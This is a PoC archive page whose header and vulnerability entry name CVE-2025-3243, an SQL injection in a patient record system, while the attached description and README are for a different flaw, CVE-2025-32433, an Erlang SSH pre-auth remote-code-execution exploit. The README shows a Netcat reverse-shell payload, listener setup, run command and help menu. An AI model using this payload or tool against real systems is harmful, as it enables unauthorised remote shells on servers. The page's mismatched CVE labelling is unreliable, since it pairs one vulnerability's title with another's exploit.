Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-3243 PoC — code-projects Patient Record Management System dental_form.php sql injection

Source
https://github.com/TeneBrae93/CVE-2025-3243
Associated Vulnerability
Title:code-projects Patient Record Management System dental_form.php sql injection (CVE-2025-3243)
Description:A vulnerability was found in code-projects Patient Record Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dental_form.php. The manipulation of the argument itr_no/dental_no leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
Description
A proof-of-concept exploit for CVE-2025-32433, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSH_MSG_CHANNEL_REQUEST packets.
Readme
# CVE-2025-32433 Erlang SSH Library Exploit

A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.

---

## Features

- **Original exploit** by Matthew Keeley
- **Updated version** by Tyler Ramsbey:
  - Command‑line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
  - Built‑in help and usage via `argparse`
  - Erlang‑style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  - Clean function decomposition and status logging for each stage

---

## Prerequisites

- **Python 3**
- A working `nc` (Netcat) listener on your attack machine
- Network access to the target SSH service (default port `22`)

---

## Usage

1. **Start your listener** on the attack box:

   ```sh
   nc -lvnp 4444
   ```

2. **Run the exploit**:

   ```sh
   python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
   ```

3. **Wait for the shell** to connect back to your listener.


### Help Menu

```sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```

---

## Credits

- **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
- **This updated version** by Tyler Ramsbey

---

## Disclaimer

Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.
File Snapshot

 [4.0K]  /data/pocs/9e953763abdbe7fc368f093ac710e536acc566a1
├── [4.1K]  CVE-2025-3243.py
└── [2.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →